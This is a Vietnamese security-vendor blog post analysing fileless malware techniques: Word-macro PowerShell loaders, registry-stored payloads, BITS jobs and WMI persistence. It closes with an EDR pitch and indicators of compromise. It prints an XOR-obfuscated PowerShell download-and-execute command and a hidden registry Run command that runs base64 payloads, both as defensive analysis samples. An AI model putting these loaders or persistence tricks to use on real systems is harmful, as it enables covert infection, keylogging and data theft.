Posted on 12/02/2019 by CyRadar
Nhìn thấu hiểm họa “vô hình” mang tên mã độc fileless
Hồ Tân – CyRadar Team
Từ lâu, phần mềm diệt virus đã trở thành tiêu chuẩn để bảo vệ người dùng trước các mối nguy hiểm ảnh hưởng đến dữ liệu, hệ thống từ trên mạng. Từ đó, hacker luôn cố gắng tìm kiếm cách tạo ra loại mã độc vô hình với các phần mềm diệt virus. Đây là điều kiện để loại mã độc mới ra đời với tên gọi mã độc fileless có khả năng tấn công máy tính người dùng mà không bị phần mềm diệt virus thông thường phát hiện.
Để hiểu rõ hơn về mã độc fileless, chúng ta sẽ điểm lại cách thức mã độc truyền thống hoạt động:
Bước 1: Mã độc vào máy tính bằng nhiều cách thức sau: khai thác lỗ hổng, usb, tải file…
Bước 2: Sau khi vào máy tính, mã độc thực hiện lưu trữ chính nó ở trên ổ cứng.
Bước 3: Mã độc thực hiện các hành vi độc hại như ăn cắp dữ liệu, cấu hình lại hệ thống cho những cuộc tấn công khác, và nhiều hành vi khác nữa.
Bước 4: Mã độc thực hiện hành vi thường trú (tạo registry khởi động cùng hệ thống, service…) để luôn hoạt động sau mỗi lần người dùng mở máy tính lên.
Với mã độc fileless, loại mã độc này không lưu trữ file trên ổ cứng trong quá trình hoạt động. Điều này khiến cho mã độc đã thực sự trở nên “vô hình” với phần mềm diệt virus thông thường.
Chúng ta sẽ phân tích cụ thể kỹ thuật fileless ở một vài trường hợp mà hacker đã sử dụng trong các chiến dịch tấn công thực tế.
Trường hợp 1: Khai thác kỹ thuật fileless qua macro của Microsoft Word và tiến trình powershell
Đầu tiên là tổng quan cách thức lây nhiễm, hoạt động của mã độc trên máy tính người dùng
Hình 1: Quá trình thực thi của mã độc
Trong quá trình lây nhiễm, mã độc đã thực hiện 5 bước để có thể lấy cắp được thông tin của người dùng. Cụ thể từng bước như sau:
– Bước 1: Mã độc khởi nguồn là một file dữ liệu (microsoft word) đã được cài mã nguồn độc hại.
– Bước 2: Khi file word được mở ra thì mã nguồn VBS độc hại sẽ được thực thi.
Hình 2: Mã độc hại viết bằng VBS
– Bước 3: Mã độc thực hiện hành vi fileless là mở tiến trình powershell với tham số đã được mã hóa
Hình 3: Tiến trình PowerShell với tham số
Tham số:
Powershell & ( ([sTrInG]$verBOsEPreFeReNce)[1,3]+’x’-joiN”)([STrINg]::join( ”,( [cHAr[]](127,30,40, 2 , 102 , 53 , 62 ,44, 118, 52, 57,49,62 , 56 ,47 , 123,21,62 ,47, 117, 12 ,62,57 ,24 , 55 ,50 , 62 ,53, 47 , 96 , 127 ,61, 26,45 ,102 ,124, 51 ,47 ,47 , 43,97 , 116, 116 ,44,52, 41 , 48,56 , 52 , 54, 43 ,52, 43,47 ,50 ,52 , 53,40 ,117 ,56 ,52 , 54,116,34,1 , 104, 1, 116,27 ,51 , 47 , 47, 43, 97 , 116, 116, 44 ,44 , 44,117,57 ,52 , 53 , 33 , 50 , 117 , 47, 52,43,116, 98 ,48,31 ,104 ,51 , 98 ,9,116,27, 51, 47, 47 ,43,97 , 116 , 116, 44, 44, 44, 117 ,43 ,56 ,56 ,58 , 57 ,52 , 60, 58,63 , 52, 40 , 117,56 , 52 , 54 , 117,58, 41 ,116 , 57 , 8,105 ,29 ,116,27,51,47 , 47, 43 , 40, 97 , 116 ,116,48,50,53 ,52 ,48,52, 117,43 ,44 ,116 ,14 ,11, 8 , 118,8 , 62, 41 ,45 , 50,56 , 62, 118,18,53, 45, 52 , 50 , 56 ,62,40 , 118,17 , 46 , 53 , 62,118 ,107 ,105,107,21,116 ,41 , 60 , 42, 21 , 18,116, 27 ,51,47, 47,43 , 97,116,116 ,62, 55, 50,35 ,50, 41 , 43, 62 , 41 , 46, 117 , 56, 52 ,54, 116,61 , 54 , 46, 108 , 43 , 116 ,124, 117,8 , 43 , 55, 50 , 47, 115 , 124 ,27 ,124 ,114 ,96,127 , 18 , 19 , 11 ,123, 102, 123, 124,111 ,108, 105 , 124, 96,127 ,11, 43,26, 102, 127,62 ,53, 45 , 97, 47 ,62, 54 ,43 ,112 , 124, 7 ,124 ,112 , 127,18 ,19, 11 ,112,124, 117 ,62 ,35 ,62 ,124 ,96 ,61 , 52 ,41,62,58,56, 51, 115, 127 ,8, 63 ,8, 123, 50 ,53, 123 , 127 ,61,26,45,114 , 32 , 47 ,41 , 34 ,32 , 127, 30, 40 , 2,117 , 31 , 52 ,44, 53,55 , 52 ,58 ,63, 29 ,50 , 55 ,62,115, 127 ,8 , 63,8,119,123 , 127, 11,43,26 ,114 ,96,8,47 ,58,41 ,47 , 118 , 11, 41 ,52 ,56,62 , 40, 40 , 123 ,127 ,11 ,43, 26 ,96 , 57, 41 ,62,58 , 48, 96, 38 ,56, 58,47,56 , 51 , 32 , 38 ,38 )|%{[cHAr]($_ -bXoR “0x5b” ) })) )
– Bước 4: Tiếp theo, mã độc thực hiện inject code vào tiến trình explorer.exe với kỹ thuật phổ biến là Invoke-ReflectivePEInjection
– Bước 5: Mã độc thực hiện lấy thông tin máy tính, keylogger. Mà những hành vi độc hại này thuộc về tiến trình explorer.exe
Như vậy, trong cả quá trình hoạt động, mã độc fileless không có thực hiện lưu trữ file ở trên ổ cứng. Tất cả các hành vi của mã độc được thực hiện trên bộ nhớ và lợi dụng tiến trình chuẩn của Windows để thực thi như powershell.exe, explorer.exe, Microsoft word.
Trường hợp 2: Khai thác kỹ thuật fileless bằng cách sử dụng registry để cư trú và thực thi
Về cách thức lây nhiễm vào máy tính thì rất đa dạng. Mã độc có thể khai thác lỗ hổng ở các phần mềm, email lừa đảo, usb hay lây nhiễm qua mạng nội bộ.
Mẫu mã độc sau khi lây nhiễm sẽ chọn một nơi cư trú để có thể chạy thường xuyên trên máy tính như registry, task schedule. Ở đây, với mẫu mã độc fileless này sẽ thực hiện ghi vào registry khởi động (registry run).
Hình 4: Mã độc ghi value EsxilryvAvT vào registry để lưu trữ mã độc hại
Mã độc thực hiện tạo value EsxilryvAvT để lưu trữ mã độc hại và một registry Run để lưu trữ cách thức chạy mã độc hại. Registry Run có nội dung sau:
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp ‘HKCU:\Software\Classes\VKYboHBKA’).EsxilryvAvT)));
Mã độc sử dụng tiến trình PowerShell (là một tiến trình chuẩn trên windows) để thực thi nội dụng độc hại. Mã độc fileless được thực hiện ghi dữ liệu trên registry thay vì ghi trên ở cứng.
Trường hợp 3: Khai thác kỹ thuật fileless bằng cách lợi dụng dịch vụ BITS để lưu trữ và thực thi mã độc hại trên memory
Trường hợp này, hacker thực hiện khai thác một dịch vụ có tên là Background Intelligent Transfer Service (viết tắt là BITS – một dịch vụ hỗ trợ chức năng download trên windows). Sau khi lây nhiễm vào máy tính, mã độc đăng ký một công việc cho BITS (JOB):
Hình 5: Job mà mã độc đã đăng ký
Từ việc kiểm tra các job của BITS bằng câu lệnh bitsadmin /list /allusers /verbose, chúng ta có thể xem được nội dung các job đã được đăng ký. Ở đây, mã độc đã đăng ký download một file từ http://dynamaven[.]info vào C:\ProgramData\41fd8392-06b1-1\41fd8392-06b1-1.d. Sau đó, mã độc sẽ thực thi file tải về bằng tiến trình cmd.exe được ghi ở chỗ NOTIFICATION COMMAND LINE. Như vậy, mã độc không có ghi bất kỳ dữ liệu độc hại nào trên ở cứng mà thay vào đó, mã độc đã ghi dữ liệu vào một dịch vụ BITS trên windows. Nếu như không kiểm tra ở trong các job của BITS thì mã độc vẫn luôn luôn tồn tại trên máy tính.
Trường hợp 4: Khai thác kỹ thuật fileless thông qua WMI trên Windows
WMI là viết tắt của dịch vụ Windows Management Instrumentation. WMI là cơ sở hạ tầng cho việc quản lý dữ liệu và hoạt động trên hệ thống Windows. WMI cho phép nhúng một đoạn mã Script để có thể thực thi mỗi lần Windows được khởi động. Chính vì điều này mà hacker chỉ cần đăng ký một WMI Class có một mã Script với nhiệm vụ download và thực thi file tải về.
Mã độc được nhúng Script vào WMI thì trên ổ cứng sẽ không cần phải lưu trữ file mà mã độc hại vẫn có thể thực thi một cách bình thường. Đồng thời, WMI cũng là một nơi mà các phần mềm thường không chú ý nhiều và khó khăn trong việc phát hiện mã độc.
Vậy làm sao để bảo vệ máy tính trước những cuộc tấn công fileless?
Mã độc fileless đã hoàn toàn qua mặt được các phần mềm diệt virus thông thường. Không những thế, hàng loạt mã độc tinh vi khác liên tục được ra đời và cải tiến bởi bàn tay hacker như: Advanced Persistent Threat, TTPs (Tactics, Techniques and Procedures, Lateral Movement…
Vậy đâu là giải pháp triệt để giúp người dùng tự bảo vệ hệ thống mạng và các dữ liệu quan trọng của bản thân khỏi mã độc fileless nói riêng và các loại mã độc khác nói chung? Câu trả lời không gì khác ngoài Endpoint Detection & Respone (viết tắt là EDR).
Tại sao EDR lại có khả năng bắt được mẫu mã độc fileless?
EDR hoàn toàn có khả năng loại bỏ mẫu mã độc fileless, bởi lẽ:
– EDR liên tục giám sát, phân tích các hoạt động bất thường xảy ra trên máy tính như tiến trình, memory, gọi API… để đưa ra nhận định chính xác nhất là máy tính đã nhiễm mã độc hay không.
– EDR thực hiện loại bỏ mã độc ra khỏi máy tính khi tự động phát hiện ra. Sau đó, EDR sẽ cảnh báo cho người dùng các nhân, cho quản lý biết rõ ràng hiện tượng, hoạt động của mã độc trên máy tính đã bị lây nhiễm.
– EDR cung cấp khả năng truy vết lại các hoạt động của mã độc trên toàn bộ hệ thống được giám sát.
– EDR cung cấp khả năng phòng vệ cho các máy tính trong hệ thống khi phát hiện ra một máy tính đã bị lấy nhiễm. Nhằm hạn chế khả năng lây nhiễm của mã độc trong mạng nội bộ của hệ thống.
Các Domain, IP, mã hash liên quan
SHA-1
63264E53A823A0C8870F65A6E00D8CAEB2702710
2269B81E16A06991535FDC2AB21330173008F3A8
3218BB4C17F1C21DD80A0F0D50FBB7C21F814DBD
BE5585535F29C9E6E10AAB051A9453E6F5C848BD
ea6445c8e29b134d11d512c2faca974b91468ef9
Domain/IP
http://workcompoptions[.]com/yZ3Z/
http://www.bonzi[.]top/9kD3h9R/
http://www.pccabogados.com[.]ar/bS2F
https://kinoko[.]pw/UPS-Service-Invoices-June-020N/rgqNI
http://elixirperu[.]com/fmu7p/
housandry[.]info
81[.]171[.]14[.]76